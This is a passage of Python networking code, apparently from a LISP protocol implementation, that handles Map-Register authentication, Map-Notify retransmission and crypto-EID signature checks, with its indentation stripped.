rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
# Returns None if the IPv6 EID is not a crypto-hash address. These addresses
# are not authenticated.
#
def lisp_get_eid_hash(eid):
hash_mask_len = None
for eid_prefix in lisp_eid_hashes:
#
# For wildcarding the instance-ID.
#
iid = eid_prefix.instance_id
if (iid == -1): eid_prefix.instance_id = eid.instance_id
ms = eid.is_more_specific(eid_prefix)
eid_prefix.instance_id = iid
if (ms):
hash_mask_len = 128 - eid_prefix.mask_len
break
#endif
#endfor
if (hash_mask_len == None): return(None)
address = eid.address
eid_hash = ""
for i in range(0, hash_mask_len / 16):
addr = address & 0xffff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(4) + ":" + eid_hash
address >>= 16
#endfor
if (hash_mask_len % 16 != 0):
addr = address & 0xff
addr = hex(addr)[2:-1]
eid_hash = addr.zfill(2) + ":" + eid_hash
#endif
return(eid_hash[0:-1])
#enddef
#
# lisp_lookup_public_key
#
# Given an EID, do a mapping system lookup for a distinguished-name EID
# 'hash-<cga-hash>' to obtain the public-key from an RLOC-record.
#
# Return [hash_id, pubkey, True/False]. Values can be of value None but last
# boolean argument is if the hash lookup was found.
#
def lisp_lookup_public_key(eid):
iid = eid.instance_id
#
# Parse out CGA hash to do public-key lookup with instance-ID and hash
# as a distinguished-name EID.
#
pubkey_hash = lisp_get_eid_hash(eid)
if (pubkey_hash == None): return([None, None, False])
pubkey_hash = "hash-" + pubkey_hash
hash_eid = lisp_address(LISP_AFI_NAME, pubkey_hash, len(pubkey_hash), iid)
group = lisp_address(LISP_AFI_NONE, "", 0, iid)
#
# Do lookup in local instance-ID.
#
site_eid = lisp_site_eid_lookup(hash_eid, group, True)
if (site_eid == None): return([hash_eid, None, False])
#
# Look for JSON RLOC with key "public-key".
#
pubkey = None
for rloc in site_eid.registered_rlocs:
json_pubkey = rloc.json
if (json_pubkey == None): continue
try:
json_pubkey = json.loads(json_pubkey.json_string)
except:
lprint("Registered RLOC JSON format is invalid for {}".format( \
pubkey_hash))
return([hash_eid, None, False])
#endtry
if (json_pubkey.has_key("public-key") == False): continue
pubkey = json_pubkey["public-key"]
break
#endfor
return([hash_eid, pubkey, True])
#enddef
#
# lisp_verify_cga_sig
#
# Verify signature of an IPv6 CGA-based EID if the public-key hash exists
# in the local mapping database (with same instance-ID).
#
def lisp_verify_cga_sig(eid, rloc_record):
#
# Use signature-eid if in JSON string. Otherwise, Crypto-EID is signature-
# EID.
#
sig = json.loads(rloc_record.json.json_string)
if (lisp_get_eid_hash(eid)):
sig_eid = eid
elif (sig.has_key("signature-eid")):
sig_eid_str = sig["signature-eid"]
sig_eid = lisp_address(LISP_AFI_IPV6, sig_eid_str, 0, 0)
else:
lprint(" No signature-eid found in RLOC-record")
return(False)
#endif
#
# Lookup CGA hash in mapping datbase to get public-key.
#
hash_eid, pubkey, lookup_good = lisp_lookup_public_key(sig_eid)
if (hash_eid == None):
eid_str = green(sig_eid.print_address(), False)
lprint(" Could not parse hash in EID {}".format(eid_str))
return(False)
#endif
found = "found" if lookup_good else bold("not found", False)
eid_str = green(hash_eid.print_address(), False)
lprint(" Lookup for crypto-hashed EID {} {}".format(eid_str, found))
if (lookup_good == False): return(False)
if (pubkey == None):
lprint(" RLOC-record with public-key not found")
return(False)
#endif
pubkey_str = pubkey[0:8] + "..." + pubkey[-8::]
lprint(" RLOC-record with public-key '{}' found".format(pubkey_str))
#
# Get signature from RLOC-record in a form to let key.verify() do its
# thing.
#
sig_str = sig["signature"]
try:
sig = binascii.a2b_base64(sig_str)
except:
lprint(" Incorrect padding in signature string")
return(False)
#endtry
sig_len = len(sig)
if (sig_len & 1):
lprint(" Signature length is odd, length {}".format(sig_len))
return(False)
#endif
#
# The signature is over the following string: "[<iid>]<eid>".
#
sig_data = sig_eid.print_address()
#
# Verify signature of CGA and public-key.
#
pubkey = binascii.a2b_base64(pubkey)
try:
key = ecdsa.VerifyingKey.from_pem(pubkey)
except:
bad = bold("Bad public-key", False)
lprint(" {}, not in PEM format".format(bad))
return(False)
#endtry
#
# The hashfunc must be supplied to get signature interoperability between
# a Go signer an a Python verifier. The signature data must go through
# a sha256 hash first. Python signer must use:
#
# ecdsa.SigningKey.sign(sig_data, hashfunc=hashlib.sha256)
#
# Note to use sha256 you need a curve of NIST256p.
#
try:
good = key.verify(sig, sig_data, hashfunc=hashlib.sha256)
except:
lprint(" Signature library failed for signature data '{}'".format( \
sig_data))
lprint(" Signature used '{}'".format(sig_str))
return(False)
#endtry
return(good)
#enddef
#
# lisp_remove_eid_from_map_notify_queue
#
# Check to see if any EIDs from the input list are in the Map-Notify
# retransmission queue. If so, remove them. That is, pop the key from the
# dictionary array. The key is the catentation of the xTR address and
# map-notify nonce.
#
def lisp_remove_eid_from_map_notify_queue(eid_list):
#
# Determine from the supplied EID-list, if any EID is in any EID-list of
# a queued Map-Notify.
#
keys_to_remove = []
for eid_tuple in eid_list:
for mn_key in lisp_map_notify_queue:
map_notify = lisp_map_notify_queue[mn_key]
if (eid_tuple not in map_notify.eid_list): continue
keys_to_remove.append(mn_key)
timer = map_notify.retransmit_timer
if (timer): timer.cancel()
lprint("Remove from Map-Notify queue nonce 0x{} for EID {}".\
format(map_notify.nonce_key, green(eid_tuple, False)))
#endfor
#endfor
#
# Now remove keys that were determined to be removed.
#
for mn_key in keys_to_remove: lisp_map_notify_queue.pop(mn_key)
return
#enddef
#
# lisp_decrypt_map_register
#
# Check if we should just return a non encrypted packet, or decrypt and return
# a plaintext Map-Register message.
#
def lisp_decrypt_map_register(packet):
#
# Parse first 4 bytes which is not encrypted. If packet is not encrypted,
# return to caller. If it is encrypted, get 3-bit key-id next to e-bit.
#
header = socket.ntohl(struct.unpack("I", packet[0:4])[0])
e_bit = (header >> 13) & 0x1
if (e_bit == 0): return(packet)
ekey_id = (header >> 14) & 0x7
#
# Use 16-byte key which is 32 string characters.
#
try:
ekey = lisp_ms_encryption_keys[ekey_id]
ekey = ekey.zfill(32)
iv = "0" * 8
except:
lprint("Cannot decrypt Map-Register with key-id {}".format(ekey_id))
return(None)
#endtry
d = bold("Decrypt", False)
lprint("{} Map-Register with key-id {}".format(d, ekey_id))
plaintext = chacha.ChaCha(ekey, iv).decrypt(packet[4::])
return(packet[0:4] + plaintext)
#enddef
#
# lisp_process_map_register
#
# Process received Map-Register message.
#
def lisp_process_map_register(lisp_sockets, packet, source, sport):
global lisp_registered_count
#
# First check if we are expecting an encrypted Map-Register. This call
# will either return a unencrypted packet, a decrypted packet, or None
# if the key-id from the Map-Register is not registered.
#
packet = lisp_decrypt_map_register(packet)
if (packet == None): return
map_register = lisp_map_register()
orig_packet, packet = map_register.decode(packet)
if (packet == None):
lprint("Could not decode Map-Register packet")
return
#endif
map_register.sport = sport
map_register.print_map_register()
#
# Verify that authentication parameters are consistent.
#
sha1_or_sha2 = True
if (map_register.auth_len == LISP_SHA1_160_AUTH_DATA_LEN):
sha1_or_sha2 = True
#endif
if (map_register.alg_id == LISP_SHA_256_128_ALG_ID):
sha1_or_sha2 = False
#endif
#
# For tracking which (S,G) RLEs have changed.
#
rle_list = []
#
# Process each EID record in Map-Register message.
#
site = None
start_eid_records = packet
eid_list = []
record_count = map_register.record_count
for i in range(record_count):
eid_record = lisp_eid_record()
rloc_record = lisp_rloc_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Register packet")
return
#endif
eid_record.print_record(" ", False)
#
# Lookup lisp_site entry.
#
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
False)
match_str = site_eid.print_eid_tuple() if site_eid else None
#
# Allowing overlapping ams registered prefixes. Make sure we get the
# configured parent entry and not the registered more-specific. This
# registration could be a more-specific of the registered more-specific
# entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id) == False): key_id = 0
password = site.auth_key[key_id]
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
# If merge being requested get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
# If TTL is 0, unregister entry if source of Map-Reqister is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
# RLOC validated good. Otherwise, go to next EID record
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
# Send Map-Notify if the RLOC-set changed for thie site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
